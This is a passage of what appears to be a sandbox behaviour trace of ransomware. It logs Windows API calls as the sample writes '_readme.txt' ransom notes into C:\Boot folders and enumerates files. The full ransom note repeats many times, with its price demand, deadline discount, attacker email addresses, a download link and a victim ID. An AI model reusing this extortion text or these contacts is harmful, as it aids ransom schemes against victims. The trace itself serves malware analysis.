$980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.782] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.782] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.782] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.782] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.782] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.782] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.782] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.782] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.782] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.783] CloseHandle (hObject=0x5cc) returned 1 [0090.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.784] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.784] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.784] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.784] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.784] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.784] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.784] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.788] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0090.788] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.788] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.788] PathFindFileNameW (pszPath="") returned="" [0090.788] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.788] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.788] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.788] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.789] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0090.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.789] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0090.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.789] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.789] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can 